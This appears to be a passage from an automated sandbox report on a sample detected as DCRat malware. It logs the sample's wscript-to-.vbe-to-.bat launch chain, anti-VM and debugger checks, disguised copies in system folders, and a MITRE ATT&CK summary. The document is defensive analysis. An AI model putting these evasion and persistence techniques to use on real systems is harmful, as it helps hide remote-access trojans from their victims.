Source: C:\Users\user\Desktop\cDouNOFXle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\explorer.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\comproviderRuntimecommon\chainsavesref.exe TID: 5176	Thread sleep count: 2346 > 30	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe TID: 5720	Thread sleep count: 1143 > 30	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe TID: 3028	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 4716	Thread sleep count: 1491 > 30	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 5100	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 1668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\explorer.exe TID: 5748	Thread sleep count: 1035 > 30
Source: C:\Recovery\explorer.exe TID: 6120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\explorer.exe TID: 2200	Thread sleep count: 1161 > 30
Source: C:\Recovery\explorer.exe TID: 5532	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\explorer.exe	Thread delayed: delay time: 922337203685477

Source: C:\comproviderRuntimecommon\chainsavesref.exe	Window / User API: threadDelayed 2346	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Window / User API: threadDelayed 1143	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Window / User API: threadDelayed 1491	Jump to behavior
Source: C:\Recovery\explorer.exe	Window / User API: threadDelayed 1035
Source: C:\Recovery\explorer.exe	Window / User API: threadDelayed 1161

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\comproviderRuntimecommon\chainsavesref.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_0007DD72 VirtualQuery,GetSystemInfo,

0_2_0007DD72

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0006A5F4
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0007B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0007B8E0
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0008AAA8 FindFirstFileExA,	0_2_0008AAA8

Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\explorer.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\cDouNOFXle.exe

API call chain: ExitProcess graph end node

graph_0-23733

Source: C:\comproviderRuntimecommon\chainsavesref.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\explorer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\explorer.exe	File Volume queried: C:\ FullSizeInformation

Source: chainsavesref.exe, 00000006.00000003.288512919.000000001B7B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\]0m
Source: chainsavesref.exe, 00000006.00000002.304350296.000000001B7EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S46gOr4pcmbmd
Source: chainsavesref.exe, 00000006.00000002.304350296.000000001B7EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q91sUD2WLKC
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.364421521.000000001C070000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_0008866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0008866F

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_0008B710 GetProcessHeap,

0_2_0008B710

Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\explorer.exe	Process token adjusted: Debug
Source: C:\Recovery\explorer.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_0008753D mov eax, dword ptr fs:[00000030h]

0_2_0008753D

Source: C:\comproviderRuntimecommon\chainsavesref.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0007F063 SetUnhandledExceptionFilter,	0_2_0007F063
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0007F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0007F22B
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0008866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0008866F
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0007EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0007EF05

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\comproviderRuntimecommon\chainsavesref.exe C:\comproviderRuntimecommon\chainsavesref.exe	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process created: unknown unknown	Jump to behavior

Source: C:\comproviderRuntimecommon\chainsavesref.exe	Queries volume information: C:\comproviderRuntimecommon\chainsavesref.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Queries volume information: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Queries volume information: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\explorer.exe	Queries volume information: C:\Recovery\explorer.exe VolumeInformation
Source: C:\Recovery\explorer.exe	Queries volume information: C:\Recovery\explorer.exe VolumeInformation

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0007A63C

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_0007ED5B cpuid

0_2_0007ED5B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_0007D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0007D5D4

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_0006ACF5 GetVersionExW,

0_2_0006ACF5

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chainsavesref.exe PID: 3372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 3432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 2756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5580, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chainsavesref.exe PID: 3372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 3432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 2756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5580, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	221 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
